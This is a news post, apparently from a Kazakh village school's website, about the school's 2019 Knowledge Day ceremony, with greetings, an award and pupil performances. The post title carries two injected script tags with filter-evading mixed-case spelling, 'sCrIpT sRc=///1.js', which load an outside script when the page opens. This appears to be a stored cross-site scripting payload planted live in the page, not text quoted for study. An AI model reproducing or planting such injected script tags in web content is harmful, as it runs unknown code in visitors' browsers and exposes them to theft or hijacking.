Білім күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.09.2019

Білім күні мерекесі

   Ғ.Әбдірахманұлы  атындағы Қима орта мектебінде Білім күні мерекесіне арналған салтанатты линейка өткізіліп, ұстаздар шәкірттерін қуанышпен қарсы алды. Мектеп директоры Мейрамова Гүлсім Жұмағалиқызы барша қауымды құттықтап, тәжірибелі ұстаз – Абдуалиева К.Е. халықаралық  деңгейдегі І дәрежелі «Педагогикалық атақ» дипломы мен төс белгісімен марапаттады. Іс-шараның құрметті қонақтары: «Nur Otan» партиясының бірінші төрайымы  Пшембаева Д.С., Жақсы ауданының білім беру бөлімінің әдіскері Айтжанова Г.Қ., Жаңа Қима ауылының әкімі Сыздыкпаев Е.Т. өз лебіздерін білдіріп, мерекемен құттықтады. Мектеп табалдырығын алғаш аттаған кішкентай бүлдіршіндер жиналған қауымды тамаша өлең жолдарымен таң қалдырып, сүйкімді қылықтарымен баурап алды. Мектептің өнер жұлдыздары:  Қажимуратова Асем, Рамазан Кәусар, «Гүлдер-ай» би тобы өнерлерін көрсетіп, мерекелік іс-шараны көркемдеді. Білім күні мерекесі «Саналы ұрпақ – жарқын болашақ» тақырыбында тәрбие сағаттарымен жалғасты.

 

 

 

Директордың тәрбие жөніндегі орынбасары          Омарова А.Б.

Просмотров: 549


Пікір қосу



Деректерді қолтаңбаға қосу